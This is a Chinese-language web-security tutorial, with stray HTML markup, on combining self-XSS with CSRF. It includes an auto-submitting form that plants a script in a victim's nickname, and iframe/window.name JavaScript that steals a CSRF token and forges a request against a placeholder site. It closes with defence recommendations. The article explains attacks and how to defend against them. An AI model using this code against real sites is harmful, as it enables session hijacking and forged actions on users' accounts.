XSS与CSRF联合攻击技术分析<\/h1>

1. 利用CSRF盗取SELF-XSS的Cookie<\/h2>

攻击场景<\/h3>

网站A存在SELF-XSS漏洞（如用户昵称处）<\/li>
该XSS无法被其他用户直接看到（无留言板等功能）<\/li>

网站A同时存在CSRF漏洞<\/li> <\/ul>

攻击步骤<\/h3>

构造恶意网站B<\/strong>：<\/p>

包含CSRF payload，用于修改用户在A网站的昵称为XSS payload<\/li>
示例CSRF代码：<\/li> <\/ul>
<form<\/span> action<\/span>=<\/span>"https:\/\/siteA.com\/update_nickname"<\/span> method<\/span>=<\/span>"POST"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"nickname"<\/span> value<\/span>=<\/span>"<script>恶意代码<\/script>"<\/span>> <\/span><\/span><\/form<\/span>> <\/span><\/span><script<\/span>>document.forms<\/span>[0<\/span>].submit<\/span>();<\/script<\/span>> <\/span><\/span><\/code><\/pre><\/li> 诱导用户访问<\/strong>：<\/p> 用户访问恶意网站B时，CSRF payload自动执行<\/li> 用户在A网站的昵称被修改为XSS payload<\/li> <\/ul> <\/li> 触发XSS<\/strong>：<\/p> 用户再次访问A网站时，页面显示昵称触发XSS<\/li> XSS payload将用户Cookie发送给攻击者<\/li> <\/ul> <\/li> <\/ol> 技术要点<\/h3> 将原本无用的SELF-XSS转化为可利用漏洞<\/li> 利用大型可信网站作为跳板增加成功率<\/li> 绕过HTTP-ONLY限制（通过直接执行操作而非窃取Cookie）<\/li> <\/ul> 2. 利用XSS窃取CSRF防御Token<\/h2> 攻击场景<\/h3> 网站A使用Token防御CSRF<\/li> 网站A同时存在XSS漏洞<\/li> <\/ul> 攻击步骤<\/h3> 第一阶段：获取Token<\/h4> 构造XSS payload<\/strong>：<\/p> 获取页面中的CSRF Token<\/li> 将Token赋值给window.name<\/li> 示例：<\/li> <\/ul> var<\/span> token<\/span> =<\/span> document.querySelector<\/span>('input[name="csrf_token"]'<\/span>).value<\/span>; <\/span><\/span>window.name<\/span> =<\/span> token<\/span>; <\/span><\/span><\/code><\/pre><\/li> 嵌入恶意URL<\/strong>：<\/p> 将XSS payload嵌入A网站的URL中<\/li> <\/ul> <\/li> <\/ol> 第二阶段：跨域获取Token<\/h4> 创建恶意网站B<\/strong>：包含以下JS代码：<\/li> <\/ul> \/\/ 创建iframe加载带有XSS的A网站页面 <\/span><\/span><\/span><\/span>var<\/span> iframe<\/span> =<\/span> document.createElement<\/span>('iframe'<\/span>); <\/span><\/span>iframe<\/span>.src<\/span> =<\/span> 'https:\/\/siteA.com\/vulnerable_page?xss=<script>...<script>'<\/span>; <\/span><\/span>document.body<\/span>.appendChild<\/span>(iframe<\/span>); <\/span><\/span> <\/span><\/span>\/\/ 延迟执行以确保XSS完成 <\/span><\/span><\/span><\/span>setTimeout<\/span>(function<\/span>() { <\/span><\/span> \/\/ 修改iframe源为同源页面 <\/span><\/span><\/span><\/span> iframe<\/span>.contentWindow<\/span>.location<\/span> =<\/span> 'about:blank'<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 获取window.name中的Token <\/span><\/span><\/span><\/span> var<\/span> token<\/span> =<\/span> iframe<\/span>.contentWindow<\/span>.name<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 销毁iframe <\/span><\/span><\/span><\/span> document.body<\/span>.removeChild<\/span>(iframe<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 使用Token发起CSRF攻击 <\/span><\/span><\/span><\/span> launchCsrfAttack<\/span>(token<\/span>); <\/span><\/span>}, 2000<\/span>); <\/span><\/span><\/code><\/pre><\/li> <\/ol> 第三阶段：发起CSRF攻击<\/h4> 使用获取的Token构造合法请求<\/li> 示例：<\/li> <\/ul> function<\/span> launchCsrfAttack<\/span>(token<\/span>) { <\/span><\/span> var<\/span> form<\/span> =<\/span> document.createElement<\/span>('form'<\/span>); <\/span><\/span> form<\/span>.action<\/span> =<\/span> 'https:\/\/siteA.com\/sensitive_action'<\/span>; <\/span><\/span> form<\/span>.method<\/span> =<\/span> 'POST'<\/span>; <\/span><\/span> <\/span><\/span> var<\/span> input<\/span> =<\/span> document.createElement<\/span>('input'<\/span>); <\/span><\/span> input<\/span>.type<\/span> =<\/span> 'hidden'<\/span>; <\/span><\/span> input<\/span>.name<\/span> =<\/span> 'csrf_token'<\/span>; <\/span><\/span> input<\/span>.value<\/span> =<\/span> token<\/span>; <\/span><\/span> form<\/span>.appendChild<\/span>(input<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 添加其他必要参数... <\/span><\/span><\/span><\/span> <\/span><\/span> document.body<\/span>.appendChild<\/span>(form<\/span>); <\/span><\/span> form<\/span>.submit<\/span>(); <\/span><\/span>} <\/span><\/span><\/code><\/pre>技术要点<\/h3> 利用window.name的跨域特性传递Token<\/li> 通过修改iframe源绕过同源策略限制<\/li> window.name在页面跳转后保持不变<\/li> 实现两阶段攻击：先获取Token，再发起CSRF<\/li> <\/ul> 防御建议<\/h2> 针对SELF-XSS+CSRF攻击<\/h3> 实施严格的CSP策略<\/li> 对用户输入进行严格过滤和转义<\/li> 为敏感操作添加CSRF Token<\/li> 检查Referer头部<\/li> <\/ol> 针对XSS+Token窃取攻击<\/h3> 加强XSS防护：<\/p> 输入输出过滤<\/li> 内容安全策略(CSP)<\/li> HttpOnly标志<\/li> <\/ul> <\/li> 增强CSRF Token保护：<\/p> 将Token存储在HttpOnly Cookie中<\/li> 使用每次请求更换的Token<\/li> 检查Token与用户会话的绑定关系<\/li> <\/ul> <\/li> 限制跨域通信：<\/p> 设置X-Frame-Options头部<\/li> 使用SameSite Cookie属性<\/li> <\/ul> <\/li> <\/ol>